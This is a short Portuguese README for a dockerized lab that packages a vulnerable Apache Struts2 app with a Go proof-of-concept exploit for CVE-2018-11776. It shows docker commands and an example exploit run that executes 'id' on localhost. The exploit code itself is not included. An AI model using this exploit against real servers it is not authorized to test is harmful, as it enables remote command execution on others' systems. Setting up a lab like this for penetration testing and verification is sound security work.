
Exploit de prova de conceito dockerizado para CVE-2018-11776 (Apache Struts2) com payload de execução de comandos baseado em Go para testes de penetração e verificação de vulnerabilidades.
Você pode construir sua própria imagem e executá-la:
docker build . -t your_image_name
docker container run -it --rm -p 8080:8080 your_image_name
Ou você pode simplesmente puxar a que criei com amor para você:
docker container run -it --rm -p 8080:8080 tuxotron/cve-2018-11776
Aplicação vulnerável rodando na porta 8080
Para testar o exploit, você precisará do Go no seu sistema. A sintaxe é:
exploit-cve-2018-11776 URL COMMAND
Por exemplo, você pode executar algo como:
go run exploit-cve-2018-11776.go http://localhost:8080 "id"
Isso deve exibir o resultado do comando id.
O exploit é uma adaptação para Go do exploit escrito em Python a partir deste repositório
Divirta-se!